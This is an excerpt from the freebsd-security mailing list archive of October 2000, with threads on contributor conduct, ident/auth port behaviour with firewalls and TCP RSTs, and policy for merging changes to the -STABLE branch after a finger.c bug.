to what's wrong, but some folks just seem to go into orbit. The "Please die" message was truly a prime example of such junk emitters. It added *nothing*, but let me know more about the personality of the responder than I wanted to know. What next, IP attacks on his machines? Pedophile references? Geez, folks... I know some of the threads are long, but I blame the repliers as much as Brett for that. Most seem to begin with serious problems or questions that matter to us all. Sometimes more homework should be done beforehand, but sometimes we should all take the last line of your .sig to heart. Go back and read the original post - does it warrant all this tripe. (mine or others? 
If folks *must* reply to this, can we all just sit on our hands for a while afterward and go on to another thread some time? - Jy@ > -- > Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 [ ... ] > Never attribute to malice what can adequately be explained by incompetence. -- James Wyatt | Programming since the HP55/65 came out. R/W Systems | Human since birth. FreeBSD for a few years. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 11: 8: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from zeta.qmw.ac.uk (zeta.qmw.ac.uk [138.37.6.6]) by hub.freebsd.org (Postfix) with ESMTP id D04C537B66D for ; Tue, 3 Oct 2000 11:08:03 -0700 (PDT) Received: from xi.css.qmw.ac.uk ([138.37.8.11]) by zeta.qmw.ac.uk with esmtp (Exim 3.02 #1) id 13gWTt-0002rU-00 for security@freebsd.org; Tue, 03 Oct 2000 19:07:57 +0100 Received: from cgaa180 by xi.css.qmw.ac.uk with local (Exim 1.92 #1) for security@FreeBSD.ORG id 13gWTu-0006gD-00; Tue, 3 Oct 2000 19:07:58 +0100 X-Mailer: exmh version 2.0.2 2/24/98 To: security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-reply-to: Your message of "Tue, 03 Oct 2000 13:22:27 EDT." <200010031722.NAA41823@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 03 Oct 2000 19:07:58 +0100 From: David Pick Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Lyndon Nerenberg commented: > David> Sorry, I don't get this. If sendmail attempts to call the > David> "auth" port on the sending machine and gets a response it > David> should be happy. If it gets no response (after a time-out) > David> it would be entitled to retry a few times in case of packet > David> loss. > > No it wouldn't. TCP takes care of the retries for you. True. > If the auth > service is blocked by a firewall the firewall will usually eat the SYN > packets, and you will never get a RST. 
Unless you've told the firewall package to generate one. Both IPFW and IPFILTER can be told to do this these days. Garrett Wollman commented: > < said: > > > gets no response (after a time-out) it would be entitled to retry a > > few times in case of packet loss. *But* if it gets a RST, which is a > > If net.inet.tcp.blackhole is set, an RST will not be emitted. True. Unless the RST is coming from IPFW or IPFILTER rules. They tend to the way I run my machines. But I had forgotten that variable. So, getting back to the original discussion, What we want to make sure is that sendmail is not unnecessarily delayed. (And "exim" which does the same thing.) So we need to make sure that either: - an "auth" daemon is running (or built in to "inetd" or whatever) - an "auth" daemon is not running and a RST packet is returned regardless of the setting og "net.inet.blackhole" The first option may give away too much information. The second slightly defeats the objective of the "blackhole" option. But, if we *really* care it would be possible to arrange one or the other of the "firewall" packages to generate a RST response to "auth" queries *if the query was received from a machine we "know" about, but not from other machines*. The precise definition of "know" is more problematical. The "best" would be: a machine to which we have a connection open and IPFilter might be enhancable to do this provided we used the "keep state" options on outward connections. If we sent all outgoing mail to a "smart host" then that would be a candidate for being told there is no "auth" data available rather than being told nothing at all. And there's always the option of giving real data to only the questioners we "know" about. But is'a all a lot of work, and I wonder if it's worth it. As far as I can see it's only a problem if the RSTs don't happen for one reason or another. And my original comment still applies. 
I don't see why a RST *that gets sent* should cause any more delay than an "accept and here's the data".

--
David Pick

From: Bill Fumerola
To: James Wyatt
Cc: Poul-Henning Kamp, Brett Glass, Wes Peters, security@FreeBSD.ORG
Date: Tue, 3 Oct 2000 14:20:36 -0400
Subject: Re: politeness

On Tue, Oct 03, 2000 at 12:56:35PM -0500, James Wyatt wrote:

> I smell something rotten in Denmark. No first amendment there, I guess.

Thankfully, the US constitution doesn't apply to the FreeBSD mailing lists.

--
Bill Fumerola - Network Architect, BOFH / Chimes, Inc.
billf@chimesnet.com / billf@FreeBSD.org

From: Poul-Henning Kamp
To: James Wyatt
Cc: Brett Glass, Wes Peters, security@FreeBSD.ORG
Date: Tue, 03 Oct 2000 20:23:06 +0200
Subject: Re: politeness

>> Depending on your luck, or lack of it, the core team may finally
>> have had it with freedom, liberty and equality in your particular
>> case, if you don't learn to control your email style and quantity
>> pretty damn fast.
>
> More fascist control-speak?

A mere statement of facts. Neither any single person, nor any single person's civil rights, will ever be more important than the FreeBSD project as such.

If sufficiently many Well Known Developers complain to core asking for Brett to be "banned or else...", he will be banned because his net contribution to the project would rapidly go negative otherwise.

I personally think that Brett is one of the people who are a very good argument for a 5 day waiting period before you can send an email. But I will not vote for banning/filtering him because of that, nor will I because my perception is that he is an alarmist sensationalist who can't think a straight thought for 5 minutes.
I will vote to ban/filter him (or anybody else) to protect the project and its resources the first instant it becomes necessary.

--
Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG         | TCP/IP since RFC 956
FreeBSD coreteam member | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.

From: Brian Somers
To: Paul Richards
Cc: Christopher Masto, Warner Losh, Kris Kennaway, Joseph Scott, Brian Somers, cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG, brian@Awfulhak.org
Date: Tue, 03 Oct 2000 19:35:11 +0100
Subject: Re: cvs commit: src/usr.bin/finger finger.c

> I think we should have a stable release team, that changes to the stable
> branch should be gated through to ensure they're thoroughly tested and
> that there's a need for them to be backported. I'd be happy to work with
> anyone else who wants to volunteer to do that since maintaining a stable
> version of the OS is a major issue for me with my new hat on.

I'd be willing to be part of such a team.

> Paul Richards
> FreeBSD Services Ltd

--
Brian
Don't _EVER_ lose your sense of humour !

From: Chris Wasser
To: freebsd-security@FreeBSD.ORG
Date: Tue, 3 Oct 2000 12:50:25 -0600
Subject: Re: politeness

On Tue, Oct 03, 2000 at 08:23:06PM +0200, Poul-Henning Kamp wrote:

> Neither any single person, nor any single person's civil rights
> will ever be more important than the FreeBSD project as such.
> ...blah blah blah

This is understandable.
Sometimes we are forced to work with people we may not get along with; this is how life works. It surprises me that the core team would degrade into a school-yard fight over the actions of one person. Isn't this what happened to NetBSD/OpenBSD? Are we headed along that road now?

I would certainly be annoyed if there was some sort of Holy Purification involved in the mailing lists; everyone has an opinion, good or bad, and deserves to be heard. 'man 1 procmail' if you're all bothered by his comments; filter him out rather than ostracizing him.

I should know better than to even bother replying because it continues the issue onwards, but hey, liberty is great. Just my two cents.

From: Poul-Henning Kamp
To: Chris Wasser
Cc: freebsd-security@FreeBSD.ORG
Date: Tue, 03 Oct 2000 20:56:01 +0200
Subject: Re: politeness

In message <20001003125025.A81873@area51.v-wave.com>, Chris Wasser writes:

> On Tue, Oct 03, 2000 at 08:23:06PM +0200, Poul-Henning Kamp wrote:
>> Neither any single person, nor any single person's civil rights
>> will ever be more important than the FreeBSD project as such.
>> ...blah blah blah
>
> This is understandable.
>
> Sometimes we are forced to work with people we may not get along
> with, this is how life works. It surprises me that the core team
> would degrade into a school-yard fight over the actions of one
> person, isn't this what happened to NetBSD/OpenBSD? Are we headed
> along that road now?

You misunderstand me: Until now the core team have resisted calls for Brett to be banned&filtered. What I'm saying is that core won't be able to resist forever if Brett doesn't grab one or more clues of the many handed to him.

This is not about core wanting to ban/filter Brett, this is about Brett having annoyed enough people that core soon won't have a choice in the matter...

--
Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG         | TCP/IP since RFC 956
FreeBSD coreteam member | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.

From: Brett Glass
To: Warner Losh, Paul Richards
Cc: cvs-committers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Date: Tue, 03 Oct 2000 12:59:54 -0600
Subject: STABLE support team [Was: cvs commit: src/usr.bin/finger finger.c]
At 12:00 PM 10/3/2000, Warner Losh wrote:

> I'd support this strongly, both as Warner Losh, Committer and as
> Warner Losh, Security Officer. My current job uses -stable and needs
> to have it be sane at "all"[*] times, or we waste a lot of effort
> bringing in and backing out unstable versions (we do some sanity
> testing before bringing a version in, but there's only so much you can
> do).
>
> I'd be able to work on this on an irregular basis depending on how
> saturated I am at work.

I'd be glad to help. As someone in a similar position (I *cannot* adopt a branch for use on production servers before the .2 release), I've always been a strong advocate of keeping -STABLE patched against newly discovered problems.

When you think about it, it should not be surprising that a growing number of users want this. If folks are running -STABLE on production servers because they want rock-solid performance, they certainly will also care about having security holes patched in a timely way. After all, they don't want those mission-critical machines to be cracked.
--Brett Glass

From: James Wyatt
To: Bill Fumerola
Cc: Poul-Henning Kamp, Brett Glass, Wes Peters, security@FreeBSD.ORG
Date: Tue, 3 Oct 2000 13:54:52 -0500 (CDT)
Subject: Re: politeness

On Tue, 3 Oct 2000, Bill Fumerola wrote:

> On Tue, Oct 03, 2000 at 12:56:35PM -0500, James Wyatt wrote:
>
> > I smell something rotten in Denmark. No first amendment there, I guess.
>
> Thankfully, the US constitution doesn't apply to the FreeBSD mailing lists.

Unfortunately, neither does The Golden Rule from what I've seen lately.
- Jy@

From: Gerhard Sittig
To: freebsd-security@freebsd.org
Date: Tue, 3 Oct 2000 15:39:46 +0200
Subject: Re: OpenSSH

On Tue, Oct 03, 2000 at 13:55 +0300, Roman Shterenzon wrote:

> Hello all,
> I'm going through weekly BSD security digest:
> http://securityportal.com/topnews/weekly/bsd20001002.html
>
> What is that OpenSSH bug they're talking about? Does anyone
> know of a workaround?

I guess (haven't read the above doc) it's about the BugTraq thread discussed with the "scp file transfer hole" subject (turning out to be an rcp heritage). List archives are at securityfocus.com.

virtually yours
82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig
true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
If you don't understand or are scared by any of the above ask your parents or an adult to help you.
From: "David O'Brien"
To: Paul Richards
Cc: Kris Kennaway, Joseph Scott, Brian Somers, cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org
Date: Tue, 3 Oct 2000 12:22:29 -0700
Subject: Re: cvs commit: src/usr.bin/finger finger.c

On Tue, Oct 03, 2000 at 08:31:33AM +0100, Paul Richards wrote:

> I think we push too many enhancements from current to stable, when we
> should really only push bug fixes onto the stable branch.

I totally disagree. Our release branches stagnate otherwise. It also causes more people to hit our .0 releases so they can get new features rather than wait for the .1 releases.

Your comment, however, about giving time to mature in -CURRENT is on the mark.
--
-- David (obrien@FreeBSD.org)

From: "David O'Brien"
To: Warner Losh
Cc: cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Date: Tue, 3 Oct 2000 12:33:47 -0700
Subject: Re: cvs commit: src/usr.bin/finger finger.c

On Tue, Oct 03, 2000 at 10:58:30AM -0600, Warner Losh wrote:

> We used to be really good about this and as we've grown the cautious
> merge into -stable ethic has become diluted. It is time to tighten
> things down for a while again. The finger thing has shown that the
> current practices are too loose.
And the only way to return to this is to put peer pressure on committers who MFC too quickly.

--
-- David (obrien@FreeBSD.org)

From: Bill Fumerola
To: Chris Wasser
Cc: freebsd-security@FreeBSD.ORG
Date: Tue, 3 Oct 2000 16:07:46 -0400
Subject: Re: politeness

On Tue, Oct 03, 2000 at 12:50:25PM -0600, Chris Wasser wrote:

> Sometimes we are forced to work with people we may not get along
> with, this is how life works. It surprises me that the core team
> would degrade into a school-yard fight over the actions of one
> person, isn't this what happened to NetBSD/OpenBSD? Are we headed
> along that road now?

The OpenBSD/NetBSD split occurred because someone with content and clue had a disagreement. Luckily, bitching and whining will never magically generate code, so I wouldn't worry.

--
Bill Fumerola - Network Architect, BOFH / Chimes, Inc.
billf@chimesnet.com / billf@FreeBSD.org

From: Dave McKay
To: Bill Fumerola
Cc: Chris Wasser, freebsd-security@FreeBSD.ORG
Date: Tue, 3 Oct 2000 15:25:34 -0500
Subject: Re: politeness

Bill Fumerola (billf@chimesnet.com) wrote:

> The OpenBSD/NetBSD split occurred because someone with content and
> clue had a disagreement. Luckily, bitching and whining will never
> magically generate code, so I wouldn't worry.

Let me be the first to invite Brett to create BrettBSD and fix all of those nasty FreeBSD bugs he hates so much.

--
Dave McKay
Network Engineer - Google Inc.
dave@mu.org - dave@google.com

From: Bill Fumerola
To: Brett Glass
Cc: Warner Losh, Paul Richards, cvs-committers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Date: Tue, 3 Oct 2000 16:30:20 -0400
Subject: Re: STABLE support team [Was: cvs commit: src/usr.bin/finger finger.c]

On Tue, Oct 03, 2000 at 12:59:54PM -0600, Brett Glass wrote:

> I'd be glad to help. As someone in a similar position (I *cannot* adopt
> a branch for use on production servers before the .2 release), I've always
> been a strong advocate of keeping -STABLE patched against newly discovered
> problems.

Why does the version number matter? If we released a new version every two weeks, would 4.2 still be production ready for you?
What if 4.1.1 was called 4.2? Would you run it? People (not just Brett) need to look at features and benefits when deciding what version to run, not some magical number that gets incremented every now and then.

--
Bill Fumerola - Network Architect, BOFH / Chimes, Inc.
billf@chimesnet.com / billf@FreeBSD.org

From: Jordan Hubbard
To: Christopher Masto
Cc: Warner Losh, Paul Richards, Kris Kennaway, Joseph Scott, Brian Somers, cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Date: Tue, 03 Oct 2000 13:53:51 -0700
Subject: When to merge to stable [Re: cvs commit: src/usr.bin/finger finger.c]

> I think it's important to push _some_ features into stable. Having to
> wait several years for the next major "point-oh" release of FreeBSD
> (which comes with "point-oh fear" holding it back) is not the best
> way to do things. IMO. There's a place between these two extremes
> of paranoia and wild abandon, and I think that's where the MFCs should
> take place.

Which is essentially what the committer's guide tries to say.
I have to agree with Christopher here - there's no hard-and-fast rule about merging which will result in 100% success at effectively balancing user-desired features with appropriate caution, except perhaps "BE CAREFUL!" We've made mistakes at both extremes of the spectrum in the past and, being frail humans, will probably make them in the future.

If I had 3 wishes and could ask for anything I wanted, my first wish would be that there were more "hands" involved with -stable and fewer public statements from various committers, as often seen in the past, disclaiming any interest in working with -stable or saying that it's too much trouble to keep up with anything but -current. That has a demoralizing effect on the people who DO value and work with -stable and sends the wrong message to our user base as well. We can't very well say that users should avoid -current out of one side of our mouths and then say we don't do development in anything but -current out of the other side.

We've also historically tried to be nice about this and not brow-beat our volunteer developers into having to go back and look at "old code", leading to a situation where at least 95% of committers work in -current and some mysterious cadre of other folks handle the job of actually getting stuff back into -stable. I even often attempted to do that by myself until the diffs routinely got up into the 50MB range and I realized (and publicly proclaimed) that that was way too much diffage to look at and the process was getting dangerously error prone as a result.

People have since gotten a lot better about attending to -stable, don't think I haven't noticed that, but I think we still have a ways to go when it comes to the general committer perspective on it. Perhaps it's time to consider some changes to our policies on -stable?

- Jordan

P.S. No, I'm not going to tell you what my other two wishes would be.
:-)

From: Warner Losh
To: Jordan Hubbard
Cc: Christopher Masto, Paul Richards, Kris Kennaway, Joseph Scott, Brian Somers, cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Date: Tue, 03 Oct 2000 14:58:33 -0600
Subject: Re: When to merge to stable [Re: cvs commit: src/usr.bin/finger finger.c]

In message <83058.970606431@winston.osd.bsdi.com> Jordan Hubbard writes:

: P.S. No, I'm not going to tell you what my other two wishes would be.
:-)

I'm sure at least one of them wouldn't be able to be published w/o heavy editing on a family list such as this :-)

Warner

From: Jordan Hubbard
To: Paul Richards
Cc: Christopher Masto, Warner Losh, Kris Kennaway, Joseph Scott, Brian Somers, cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org
Date: Tue, 03 Oct 2000 14:18:26 -0700
Subject: Re: cvs commit: src/usr.bin/finger finger.c

> I think we should have a stable release team, that changes to the stable

Again, I don't think anything more substantive is required than getting our developers to take on more "ownership" of the -stable branch and, in so doing, create a de facto "stable release team" where more eyeballs are going over the changes, more people are vetting changes and things like the finger screwup are found almost immediately because people are actually LOOKING AT THE COMMITS which go into -stable.
That doesn't require any huge changes in process so much as it simply requires more buy-in to -stable by committers. We're obviously never going to stop making mistakes because we're human and humans make mistakes, whether it's in writing code for FreeBSD or for the European Space Agency, but we could at least get better at CATCHING those mistakes before they actually go out in release form, and for that to happen, more people need to be actively involved in the process of both writing and reading code. We don't need any additional layers of bureaucracy or special committees since those merely insulate the engineer from his true function: Coding and reviewing code.

If it's now part of your full-time hattism to worry about this then I hope you'll start spending some number of hours each day in reviewing each and every change which goes into -stable. However many other people are doing this as well or what label you put on them is not so important since you may find problems that another dozen engineers just missed, nor will being a member of any special group make you any more effective at doing that. I resist the creation of such groups, in fact, because it tends to lend the often false impression that "somebody else" is handling problems and that's how stuff starts slipping through the cracks. The bulk of our developers start figuring that they can stop taking responsibility for X, Y and Z because that's clearly the responsibility of the Foo team despite the fact that the Foo team currently has 50% of its members on vacation and the other 50% are kind of burnt-out that week.

Keeping -stable stable should be everyone's job, and making that an actual reality rather than just a statement would go a long ways towards preventing what just happened from happening again.
- Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 15:22: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 826D837B66C for ; Tue, 3 Oct 2000 15:22:01 -0700 (PDT) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id AAA96004; Wed, 4 Oct 2000 00:21:58 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: James Wyatt Cc: Michael Bryan , security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf References: From: Dag-Erling Smorgrav Date: 04 Oct 2000 00:21:57 +0200 In-Reply-To: James Wyatt's message of "Tue, 3 Oct 2000 11:25:18 -0500 (CDT)" Message-ID: Lines: 12 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org James Wyatt writes: > More and less. netstat -an is longer, sockstat has more columns. I like > the PID given in sockstat, but is there any way to get them for Unix > domain sockets? I tried "apropos domain" and "(for DIR in `echo $PATH | tr > ':' ' '` ; do ls $DIR 2> /dev/null | grep stat ; done) | more", but > neither gave me much help... - Jy@ Hmm, put this on my todo list. 
DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 15:28:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 6126637B503; Tue, 3 Oct 2000 15:28:09 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id QAA23309; Tue, 3 Oct 2000 16:27:47 -0600 (MDT) Message-Id: <4.3.2.7.2.20001003161654.00de6b60@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 03 Oct 2000 16:27:43 -0600 To: Bill Fumerola From: Brett Glass Subject: Re: STABLE support team [Was: cvs commit: src/usr.bin/finger finger.c] Cc: Warner Losh , Paul Richards , cvs-committers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-Reply-To: <20001003163020.B38472@jade.chc-chimes.com> References: <4.3.2.7.2.20001003125150.04c7f3f0@localhost> <39DA182C.C70ED553@originative.co.uk> <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> <200010031800.MAA27859@harmony.village.org> <4.3.2.7.2.20001003125150.04c7f3f0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:30 PM 10/3/2000, Bill Fumerola wrote: >Why does the version number matter? If we released a new version every two weeks, >would 4.2 still be production ready for you? What if 4.1.1 was called 4.2? Would you >run it? Well, Bill, 4.1.1 was not a full release, and all of the same activities that go into a full point release were not carried on for it. 
There's something about a full point release that gets folks off of their, er, derrieres and gets them to finish and commit changes that they had not yet completed. As you know, the purpose of 4.1.1 was to roll cryptography into -STABLE in the wake of the expiration of the RSA patent. A good thing, of course, but there are still some glitches in 4.1.1 that I expect will be fixed by 4.2. >People(not just Brett) need to look at features and benefits when deciding >what version to run, not some magical number that gets incremented every now >and then. Believe me, we do. For the moment, I and my clients have agreed that the amount of time it takes to get to a .2 release, under the current numbering system, is usually sufficient to make a development branch of FreeBSD "seasoned" and ready for the production servers. This is an approximation and a judgment call that is by no means set in stone! In the 3.x-STABLE branch, we did NOT install 3.2 because we saw problems in it. We waited a bit longer. Many of the machines got 3.3 and even 3.4. This time, we are hoping to go with 4.2 because we're eager for the TCP/IP and VM improvements. The kernel is bigger but the RAM seems to be worth it. 
--Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 15:40:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.originative.co.uk (mailgate.originative.co.uk [194.217.50.228]) by hub.freebsd.org (Postfix) with ESMTP id A42BB37B66C; Tue, 3 Oct 2000 15:40:23 -0700 (PDT) Received: from originative.co.uk (lobster.originative.co.uk [194.217.50.241]) by mailgate.originative.co.uk (Postfix) with ESMTP id 6806C1D140; Tue, 3 Oct 2000 23:40:21 +0100 (BST) Message-ID: <39DA6055.594B13E4@originative.co.uk> Date: Tue, 03 Oct 2000 23:40:21 +0100 From: Paul Richards X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Jordan Hubbard Cc: Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c References: <83262.970607906@winston.osd.bsdi.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jordan Hubbard wrote: > > > If it's now part of your full-time hattism to worry about this then I > hope you'll start spending some number of hours each day in reviewing > each and every change which goes into -stable. However many other I think you're looking at it the wrong way around. The stable team wouldn't be putting in a lot of hours reviewing stable commits. Stable commits would only occur if the stable team did them i.e. no-one else would be allowed to commit to stable. The stable team would then monitor -current, noting commits that are bug fixes, and slating them for a MFC at a later date when it's felt they've had enough of a shakeout. 
Stable would stagnate to some extent, certainly more so than it presently does, but I think that's exactly what should happen to a stable branch. That's not to say that new features would never make it back to the stable branch but they would certainly do so a lot more slowly and only if there was real value to them and not just because they exist. Paul Richards FreeBSD Services Ltd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 15:56:45 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 706) id 1D31437B502; Tue, 3 Oct 2000 15:56:38 -0700 (PDT) Date: Tue, 3 Oct 2000 15:56:38 -0700 From: Jonathan Lemon To: Paul Richards Cc: Jordan Hubbard , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001003155638.B73409@hub.freebsd.org> References: <83262.970607906@winston.osd.bsdi.com> <39DA6055.594B13E4@originative.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <39DA6055.594B13E4@originative.co.uk>; from Paul Richards on Tue, Oct 03, 2000 at 11:40:21PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 11:40:21PM +0100, Paul Richards wrote: > > > > If it's now part of your full-time hattism to worry about this then I > > hope you'll start spending some number of hours each day in reviewing > > each and every change which goes into -stable. However many other > > I think you're looking at it the wrong way around. The stable team > wouldn't be putting in a lot of hours reviewing stable commits. Stable > commits would only occur if the stable team did them i.e. no-one else > would be allowed to commit to stable. 
The stable team would then monitor > -current, noting commits that are bug fixes, and slating them for a MFC > at a later date when it's felt they've had enough of a shakeout. > > Stable would stagnate to some extent, certainly more so than it > presently does, but I think that's exactly what should happen to a > stable branch. That's not to say that new features would never make it > back to the stable branch but they would certainly do so a lot more > slowly and only if there was real value to them and not just because > they exist. Uh. If only the "-stable" team were allowed to commit to -stable, then it would quickly become the -stale branch. I think that we had this at one point with 3.X, and there were lots of complaints. -stable is not (IMHO) supposed to be just bugfixes. Doing it that way would just put more pressure on the developers to shove the next release line out the door because they want new features. If you just want "bugfixes" and no new features, then may I suggest that you stick with the 3.X branch? No new development or changes go in there, but you can still pull in critical bug fixes as needed. Then when 5.0 becomes the -stable branch, you can move on to 4.x. 
--
Jonathan

From owner-freebsd-security Tue Oct 3 16:27:26 2000
From: Kris Kennaway
Date: Tue, 3 Oct 2000 16:27:20 -0700
To: Warner Losh
Cc: Paul Richards, cvs-committers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: cvs commit: src/usr.bin/finger finger.c
Message-ID: <20001003162720.D51546@freefall.freebsd.org>
References: <39DA182C.C70ED553@originative.co.uk> <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> <39DA182C.C70ED553@originative.co.uk> <200010031800.MAA27859@harmony.village.org>
In-Reply-To: <200010031800.MAA27859@harmony.village.org>; from imp@village.org on Tue, Oct 03, 2000 at 12:00:57PM -0600

On Tue, Oct 03, 2000 at 12:00:57PM -0600, Warner Losh wrote:
> In message <39DA182C.C70ED553@originative.co.uk> Paul Richards writes:
> : I think we should have a stable release team, that changes to the stable
> : branch should be gated through to ensure they're thoroughly tested and
> : that there's a need for them to be backported. I'd be happy to work with
> : anyone else who wants to volunteer to do that since maintaining a stable
> : version of the OS is a major issue for me with my new hat on.
>
> I'd support this strongly, both as Warner Losh, Committer and as
> Warner Losh, Security Officer. My current job uses -stable and needs
> to have it be sane at "all"[*] times, or we waste a lot of effort
> bringing in and backing out unstable versions (we do some sanity
> testing before bringing a version in, but there's only so much you can
> do).

I think a formal MFC process may be too stifling, unless we have a VERY responsive MFC team. Consider that we don't want the same thing to happen as did with 3.x, where 4.0-CURRENT was allowed to diverge so much that merging bugfixes became difficult. I'd settle for committers being more cautious about merging their own changes and self-managing the process better.

Kris
--
In God we Trust -- all others must submit an X.509 certificate.
    -- Charles Forsythe

From owner-freebsd-security Tue Oct 3 16:27:38 2000
From: Peter Wemm
Date: Tue, 03 Oct 2000 16:26:07 -0700
To: Jonathan Lemon
Cc: Paul Richards, Jordan Hubbard, Christopher Masto, Warner Losh, Kris Kennaway, Joseph Scott, Brian Somers, cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org
Subject: Re: cvs commit: src/usr.bin/finger finger.c
In-Reply-To: <20001003155638.B73409@hub.freebsd.org>
Message-Id: <200010032326.e93NQ7H17213@netplex.com.au>

Jonathan Lemon wrote:
> On Tue, Oct 03, 2000 at 11:40:21PM +0100, Paul Richards wrote:
> > >
> > > If it's now part of your full-time hattism to worry about this then I
> > > hope you'll start spending some number of hours each day in reviewing
> > > each and every change which goes into -stable. However many other
> >
> > I think you're looking at it the wrong way around. The stable team
> > wouldn't be putting in a lot of hours reviewing stable commits. Stable
> > commits would only occur if the stable team did them i.e. no-one else
> > would be allowed to commit to stable. The stable team would then monitor
> > -current, noting commits that are bug fixes, and slating them for a MFC
> > at a later date when it's felt they've had enough of a shakeout.
> >
> > Stable would stagnate to some extent, certainly more so than it
> > presently does, but I think that's exactly what should happen to a
> > stable branch. That's not to say that new features would never make it
> > back to the stable branch but they would certainly do so a lot more
> > slowly and only if there was real value to them and not just because
> > they exist.
>
> Uh. If only the "-stable" team were allowed to commit to -stable,
> then it would quickly become the -stale branch. I think that we had
> this at one point with 3.X, and there were lots of complaints.

Yes, this is what happened with 3.x and it was a disaster. We must not let this happen again.

> -stable is not (IMHO) supposed to be just bugfixes. Doing it that way
> would just put more pressure on the developers to shove the next release
> line out the door because they want new features.

Yes.

> If you just want "bugfixes" and no new features, then may I suggest that
> you stick with the 3.X branch? No new development or changes go in there,
> but you can still pull in critical bug fixes as needed. Then when 5.0
> becomes the -stable branch, you can move on to 4.x.
> --
> Jonathan
>

Cheers,
-Peter
--
Peter Wemm - peter@FreeBSD.org; peter@yahoo-inc.com; peter@netplex.com.au
"All of this is for nothing if we don't go to the stars" - JMS/B5

From owner-freebsd-security Tue Oct 3 16:33:07 2000
From: Peter Wemm
